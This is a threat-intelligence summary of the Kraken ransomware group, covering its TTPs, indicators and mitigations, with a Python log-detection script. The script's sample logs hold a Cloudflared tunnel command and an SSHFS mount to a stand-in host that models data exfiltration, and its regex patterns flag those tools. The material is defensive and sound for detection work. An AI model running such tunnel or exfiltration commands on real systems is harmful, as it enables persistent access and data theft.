Full Report
In August 2025, Cisco Talos observed big-game hunting and double extortion attacks carried out by Kraken, a Russian-speaking group that has emerged from the remnants of the HelloKitty ransomware cartel.
Analysis Summary
# Threat Actor: Kraken
## Attribution & Identity
**Identification:** Kraken is a Russian-speaking ransomware group observed conducting big-game hunting operations.
**Aliases and Associations:** Suspected to have emerged from the remnants or former members of the **HelloKitty ransomware cartel**. The Kraken leak site explicitly references HelloKitty, and both groups share the same ransom note filename. Collaboration with the HelloKitty team was also hinted at in the announcement of their new forum, "The Last Haven Board."
## Activity Summary
Kraken emerged in **February 2025** and was observed by Cisco Talos in **August 2025** conducting big-game hunting and double extortion attacks. In September 2025, Kraken announced a new underground forum, "The Last Haven Board," intended as a secure communication channel for the cybercrime underground; the announcement also claimed support from the HelloKitty team and WeaCorp. Observed ransom demands reached **1 million USD**, payable in Bitcoin.
## Tactics, Techniques & Procedures
- **Initial Access:** Exploiting **Server Message Block (SMB) vulnerabilities** on internet-exposed servers.
- **Credential Access:** Extracting valid **administrator and other privileged account credentials**.
- **Persistence:** Establishing persistent remote access by deploying **Cloudflared** on compromised hosts to open a reverse tunnel to attacker infrastructure.
- **Exfiltration:** Using **SSH Filesystem (SSHFS)** to mount a remote filesystem over SSH and copy stolen data to it.
- **Lateral Movement:** Moving laterally using **Remote Desktop Protocol (RDP)** connections with stolen privileged accounts to deploy ransomware binaries across multiple systems.
- **Encryption:** Deploying cross-platform ransomware binaries targeting **Windows, Linux, and VMware ESXi**.
  - Encrypted files receive the **.zpsc** file extension.
  - The ransom note is named **readme\_you\_ws\_hacked.txt**.
  - Before encryption begins, the ransomware runs a **benchmarking** routine on the victim machine.
- **Extortion:** Employing **double extortion** tactics, operating a data leak site to publicly shame victims who do not meet ransom demands.
- **MITRE ATT&CK IDs:** Not explicitly provided in the source. Inferred from the described TTPs: T1190 Exploit Public-Facing Application (SMB on internet-exposed servers), T1078 Valid Accounts (stolen privileged credentials), T1572 Protocol Tunneling (Cloudflared reverse tunnel), T1021.001 Remote Desktop Protocol (lateral movement), T1048 Exfiltration Over Alternative Protocol (SSHFS), and T1486 Data Encrypted for Impact.
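The TTP chain above (Cloudflared tunnel, SSHFS mount, RDP logon with a privileged account, `.zpsc` files and the ransom note) is concrete enough to turn into host-level detection logic. The following Python is an added illustration, not code from the Talos report or from the Kraken tooling: it runs a handful of rules over constructed log lines and escalates hosts where more than one rule fires. The key=value record format, host names, IP addresses and the privileged-account list are assumptions; only the `.zpsc` extension, the ransom note filename, and the use of Cloudflared, SSHFS and RDP come from the summary.

```python
"""
Added illustration, not code from the Talos report or the Kraken tooling:
turn the host-level TTPs in the summary into simple detection rules and run
them over constructed log lines. The key=value record format, host names,
IP addresses and the privileged-account list are assumptions; only the
.zpsc extension, the ransom note filename, and the use of Cloudflared,
SSHFS and RDP come from the summary.
"""
import re
from dataclasses import dataclass

# Indicators taken from the summary above.
RANSOM_NOTE = "readme_you_ws_hacked.txt"
ENCRYPTED_EXT = ".zpsc"

# Site-specific assumption: accounts whose RDP logons warrant scrutiny.
PRIVILEGED_ACCOUNTS = {"corp\\administrator", "corp\\svc_backup"}

# Cloudflared is legitimate software, so key on the "tunnel" subcommand rather
# than on the binary name alone; SSHFS is matched on a remote user@host: mount spec.
CLOUDFLARED_TUNNEL = re.compile(r"\bcloudflared(\.exe)?\b.*\btunnel\b", re.I)
SSHFS_MOUNT = re.compile(r"\bsshfs\b\s+\S+@\S+:", re.I)


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    evidence: str


def parse_line(line):
    """Parse a key=value record (quoted values allowed); None if host/type are missing."""
    fields = dict(re.findall(r'(\w+)=("[^"]*"|\S+)', line))
    if "host" not in fields or "type" not in fields:
        return None
    return {k: v.strip('"') for k, v in fields.items()}


def evaluate(event):
    """Return the names of every rule that matches one parsed event."""
    hits = []
    if event["type"] == "process":
        cmd = event.get("cmdline", "")
        if CLOUDFLARED_TUNNEL.search(cmd):
            hits.append("cloudflared_reverse_tunnel")
        if SSHFS_MOUNT.search(cmd):
            hits.append("sshfs_remote_mount")
    elif event["type"] == "file":
        path = event.get("path", "").lower()
        if path.endswith(ENCRYPTED_EXT):
            hits.append("zpsc_extension_written")
        if path.endswith(RANSOM_NOTE):
            hits.append("kraken_ransom_note")
    elif event["type"] == "logon":
        # Windows logon type 10 is RemoteInteractive, i.e. an RDP session.
        if event.get("logon_type") == "10" and event.get("user", "").lower() in PRIVILEGED_ACCOUNTS:
            hits.append("rdp_logon_privileged_account")
    return hits


def scan(lines):
    """Run all rules over raw log lines, skipping anything that does not parse."""
    findings = []
    for line in lines:
        event = parse_line(line)
        if event is None:
            continue
        for rule in evaluate(event):
            findings.append(Finding(event["host"], rule, line.strip()))
    return findings


def escalate(findings, threshold=2):
    """Hosts where at least `threshold` distinct rules fired. A chain of these TTPs on
    one host is far stronger evidence than any single hit; a lone cloudflared tunnel
    may be a legitimate deployment."""
    rules_by_host = {}
    for f in findings:
        rules_by_host.setdefault(f.host, set()).add(f.rule)
    return sorted(h for h, rules in rules_by_host.items() if len(rules) >= threshold)


# Constructed sample records; not real telemetry.
SAMPLE_LOGS = [
    'host=FS01 type=process image="C:\\Windows\\Temp\\cloudflared.exe" cmdline="cloudflared.exe tunnel run --token REDACTED"',
    'host=FS01 type=logon logon_type=10 user=CORP\\Administrator src=10.0.0.25',
    'host=LNX03 type=process image="/usr/bin/sshfs" cmdline="sshfs drop@203.0.113.10:/in /mnt/x -o reconnect"',
    'host=APP02 type=file path="D:\\shares\\finance\\Q3.xlsx.zpsc"',
    'host=APP02 type=file path="D:\\shares\\finance\\readme_you_ws_hacked.txt"',
    'host=WS17 type=process image="C:\\Program Files\\cloudflared\\cloudflared.exe" cmdline="cloudflared.exe --version"',
    'this line has no structured fields and is skipped',
]

if __name__ == "__main__":
    results = scan(SAMPLE_LOGS)
    for f in results:
        print(f"{f.host:6} {f.rule:32} {f.evidence}")
    print("escalate:", escalate(results))
```

With the constructed input, FS01 (tunnel plus privileged RDP logon) and APP02 (`.zpsc` files plus ransom note) are escalated, LNX03 gets a single SSHFS finding for review, and WS17's `cloudflared --version` is correctly ignored. In production the same rules would be fed from Sysmon process-creation and file events, Windows 4624 logons, and auditd on Linux hosts, and the SSHFS rule should be paired with network telemetry for outbound SSH to unfamiliar destinations.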
## Targeting
- **Sectors:** Opportunistic; has not concentrated on any specific verticals.
- **Geography:** Spans various geographies, including the **United States, the United Kingdom, Canada, Denmark, Panama, and Kuwait**.
- **Victims:** Enterprise environments; specific organizations were not named in the summary text.
## Tools & Infrastructure
- **Malware Families Used:** Kraken ransomware (cross-platform variants for Windows, Linux, ESXi).
- **Tools Used:** **Cloudflared** (for persistence/reverse tunnel), **SSHFS** (for data exfiltration).
- **Infrastructure:** Victims are instructed to contact the actor via a Tor **onion URL** (the specific address is not given in the summary). The group also operates a data leak blog/site.
## Implications
Kraken represents a continuation of sophisticated ransomware operations, likely leveraging expertise from the defunct HelloKitty cartel. Its multi-platform ransomware (Windows, Linux, ESXi) and focus on big-game hunting indicate a high threat level against diverse enterprise environments. Its abuse of a legitimate tunneling utility (Cloudflared) for persistent remote access blends with ordinary outbound traffic, complicating both detection and remediation.
## Mitigations
- Implement robust security monitoring, potentially utilizing solutions like Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) to analyze network traffic for unwanted activity.
- Utilize security solutions like Cisco Secure Malware Analytics (Threat Grid) to identify and build protection against malicious binaries.
- Apply strong Zero Trust principles using solutions like Cisco Secure Access to enforce strict access controls.
- Deploy secure internet gateways (e.g., Cisco Umbrella) to block connections to malicious domains, IPs, and URLs.
- Ensure Multi-Factor Authentication (MFA) is enforced using solutions like Cisco Duo to prevent unauthorized access via stolen credentials.
- Keep systems patched, especially addressing known **SMB vulnerabilities** exploited for initial access, and do not expose SMB (TCP 445) directly to the internet.
- Deploy the Snort rules Talos released for this activity: SIDs **65479 and 65480**.